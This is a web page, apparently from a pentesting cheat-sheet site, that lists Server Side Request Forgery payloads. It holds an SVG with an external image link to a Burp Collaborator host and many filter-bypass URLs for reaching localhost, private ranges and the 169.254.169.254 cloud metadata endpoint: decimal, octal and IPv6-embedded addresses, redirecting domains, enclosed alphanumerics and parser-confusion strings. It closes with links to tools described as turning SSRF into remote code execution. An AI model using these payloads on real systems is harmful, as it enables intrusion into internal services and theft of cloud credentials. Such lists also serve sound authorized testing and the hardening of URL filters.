pwny.cc
Search…
Server Side Request Forgery (SSRF)

Payloads

SSRF in SVG file

1
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
2
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200">
3
<image height="200" width="200" xlink:href="http://burpcollaborator.com/image.jpeg" />
4
</svg>
Copied!

Localhost Bypasses

Using [::]

1
http://[::]:80/ #HTTP
2
http://[::]:25/ #SMTP
3
http://[::]:22/ #SSH
4
http://[::]:3128/ #SQUID
5
http://0000::1:80/ #HTTP
6
http://0000::1:25/ #SMTP
7
http://0000::1:22/ #SSH
8
http://0000::1:3128/ #SQUID
Copied!

Using a domain redirection

1
http://spoofed.burpcollaborator.net
2
http://localtest.me
3
http://customer1.app.localhost.my.company.127.0.0.1.nip.io
4
http://mail.ebc.apple.com redirect to 127.0.0.6 == localhost
5
http://bugbounty.dod.network redirect to 127.0.0.2 == localhost
Copied!

Using CIDR

1
http://127.127.127.127
2
http://127.0.1.3
3
http://127.0.0.0
Copied!

Using decimal IP location

1
http://2130706433/ = http://127.0.0.1
2
http://3232235521/ = http://192.168.0.1
3
http://3232235777/ = http://192.168.1.1
4
http://2852039166/ = http://169.254.169.254
Copied!

Using Octal IP

1
http://0177.0.0.1/ = http://127.0.0.1
2
http://o177.0.0.1/ = http://127.0.0.1
3
http://0o177.0.0.1/ = http://127.0.0.1
4
http://q177.0.0.1/ = http://127.0.0.1
Copied!

Using IPv6/IPv4 Address Embedding

1
http://[0:0:0:0:0:ffff:127.0.0.1]
2
3
#Cloud Metadata
4
http://[::ffff:169.254.169.254]
5
http://[0:0:0:0:0:ffff:169.254.169.254]
Copied!

Using malformed urls

1
localhost:+11211aaa
2
localhost:00011211aaaa
Copied!

Using weird address

1
http://0/
2
http://127.1
3
http://127.0.1
Copied!

Using enclosed alphanumerics

1
http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com
2
3
List:
4
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
Copied!

Against a weak parser

1
http://127.1.1.1:80\@127.2.2.2:80/
2
http://127.1.1.1:80\@@127.2.2.2:80/
3
http://127.1.1.1:80:\@@127.2.2.2:80/
4
http://127.1.1.1:80#\@127.2.2.2:80/
Copied!

References

GitHub - tarunkant/Gopherus: This tool generates gopher link for exploiting SSRF and gaining RCE in various servers
GitHub
Gopherus - Tool to generate gopher link for exploiting SSRF and gaining RCE in various servers
GitHub - knassar702/lorsrf: find the parameters that can be used to find SSRF or Out-of-band resource load
GitHub
lorsrf - SSRF parameter bruteforce (use scant3r module instead)
PayloadsAllTheThings/Server Side Request Forgery at master · swisskyrepo/PayloadsAllTheThings
GitHub
SSRF Payloads Repository